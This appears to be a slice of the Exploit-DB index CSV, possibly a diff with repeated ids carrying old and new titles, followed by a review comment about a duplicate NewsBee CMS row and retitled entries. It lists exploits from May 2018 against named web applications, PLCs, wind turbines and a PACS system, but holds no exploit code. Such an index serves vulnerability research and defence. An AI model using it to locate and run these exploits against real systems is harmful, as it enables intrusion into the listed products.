44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php,
44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php,
44664,exploits/php/webapps/44664.txt,"Zenar Content Management System - Cross-Site Scripting",2018-05-21,"Berk Dusunur",webapps,php,
44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,
44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java,
44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java,
44667,exploits/linux/webapps/44667.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,linux,
44671,exploits/hardware/webapps/44671.html,"Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44672,exploits/hardware/webapps/44672.txt,"Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44675,exploits/hardware/webapps/44675.html,"Teradek Cube 7.3.6 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44676,exploits/hardware/webapps/44676.html,"Teradek Slice 7.3.15 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44678,exploits/windows/webapps/44678.txt,"Schneider Electric PLCs - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,windows,
44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass",2018-05-21,L0RD,webapps,php,
44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,
44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass",2018-05-21,L0RD,webapps,php,
44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
44684,exploits/hardware/webapps/44684.txt,"Nordex N149/4.0-4.5 - SQL Injection",2018-05-22,t4rkd3vilz,webapps,hardware,
44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,
44687,exploits/linux/webapps/44687.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting",2018-05-22,t4rkd3vilz,webapps,linux,
44689,exploits/php/webapps/44689.txt,"PaulPrinting CMS Printing 1.0 - SQL Injection",2018-05-22,"Mehmet Onder",webapps,php,
44692,exploits/php/webapps/44692.txt,"iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-22,L0RD,webapps,php,
44691,exploits/java/webapps/44691.txt,"ERPnext 11 - Cross-Site Scripting",2018-05-22,"Veerababu Penugonda",webapps,java,
44698,exploits/linux/webapps/44698.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,linux,
44699,exploits/php/webapps/44699.txt,"Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting",2018-05-22,L0RD,webapps,php,
44700,exploits/php/webapps/44700.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,php,
44701,exploits/php/webapps/44701.txt,"Feedy RSS News Ticker 2.0 - 'cat' SQL Injection",2018-05-22,AkkuS,webapps,php,
44702,exploits/php/webapps/44702.txt,"NewsBee CMS 1.4 - 'download.php' SQL Injection",2018-05-22,AkkuS,webapps,php,
44703,exploits/php/webapps/44703.txt,"Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting",2018-05-22,AkkuS,webapps,php,
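Review bot: rows 44698 and 44700 carry an identical description, author and date ("NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection", AkkuS, 2018-05-22) and differ only in file path and platform (linux vs php); this looks like a duplicate entry, so confirm whether 44698 should be withdrawn or its platform corrected before merging. Secondary points: the 44679 and 44682 rows are retitled to "Multiple Vulnerabilities", which hides the Persistent XSS / CSRF / Authentication Bypass classes the earlier titles listed, and 44668 precedes 44666 while 44692 precedes 44691, breaking the id order kept elsewhere in the file.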